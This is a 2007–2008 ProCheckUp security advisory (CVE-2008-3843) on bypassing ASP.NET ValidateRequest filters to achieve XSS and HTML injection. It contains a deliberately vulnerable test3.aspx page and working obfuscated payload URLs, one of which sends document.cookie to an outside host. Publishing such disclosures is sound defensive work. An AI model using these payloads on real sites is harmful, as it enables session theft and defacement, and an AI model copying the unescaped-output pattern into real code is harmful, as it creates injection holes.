Microsoft ASP.NET ValidateRequest filters can be bypassed allowing XSS and HTML injection attacks

Vulnerability found:
03 October 2007

Vendor informed:
25 June 2007

Severity level:
Medium

Credits:
Richard Brain of ProCheckUp Ltd.

Description:
By understanding how ASP .NET malicious request filtering functions, ProCheckUp has found that it is possible to bypass ASP .NET ValidateRequest filters and perform XSS and HTML injection even against systems protected with the MS07-040 patch. This patch fixed the payload reported in ProCheckUp security bulletin PR07-03.

It was possible to perform redirect, cookie theft, and unrestricted HTML injection attacks against an ASP .NET application setup in a test environment. ProCheckUp has also found this issue to be exploitable while carrying out penetration tests on several customer's live environments.

Consequences
Attackers can potentially launch XSS and HTML injection attacks against vulnerable applications that solely rely on ASP .NET ValidateRequest filters. Such code would run within the context of the target domain.

This type of attack can result in defacement of the target site, or the redirection of confidential information (i.e.: session IDs or passwords) to unauthorised third parties.

CVE reference

CVE-2008-3843

Vulnerable

The following client/server environment was tested and found vulnerable:

- Microsoft Windows Server 2003 R2 Standard Edition Build 3790.srv03_sp2_gdr.070304-2240 : Service Pack 2 (patched Aug 08) running Microsoft IIS 6.0 web server
- ASP.NET Version: 1.1.4322.2407 (fully patched)
- ASP.NET Version: 2.0.50727 (fully patched Aug 2008)
- Microsoft Internet Explorer 6.0.2800.1106
- Microsoft Internet Explorer 7.0.5730.13

Proof of concept:
In the following examples, 'test3.aspx' is a script that solely relies on ASP .NET ValidateRequest filters, and returns user-supplied input back to the browser.

<html>

<head><title>test3.aspx</title><script>document.cookie='PCUSESSIONID=stealme'</script></head>

<body>

<form action="test3.aspx" method="get">

Your name: <input type="text" name="fname" size="20" />

<input type="submit" value="Submit" />

</form>

<%

dim fname

fname=Request.QueryString("fname")

If fname<>"" Then

Response.Write("Hello " & "<tagname " & fname & "!<br />")

Response.Write("How are you today?")

End If

%>

</body>

</html>

Alert box injection - simply provided for testing purposes (may cause DoS issues on Internet Explorer)
http://target.foo/test3.aspx?fname=<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

Cookie stealing
http://target.foo/test3.aspx?fname=<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>

How to fix:
The following statement from MSDN was forwarded by Microsoft:

"In summary, use, but do not fully trust, the ValidateRequest attribute and don't be too lazy. Spend some time to understand security threats like XSS at their roots and plan a defensive strategy centred on one key point - consider all user input evil."

References:
http://www.procheckup.com/research/views/vulnerabilities

http://www.procheckup.com/research/documents/1

http://msdn.microsoft.com/en-us/library/bb355989.aspx

http://msdn.microsoft.com/en-us/library/ms972969.aspx#securitybarriers_topic6

Legal:
Copyright 2008 Procheckup Ltd. All rights reserved.
Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.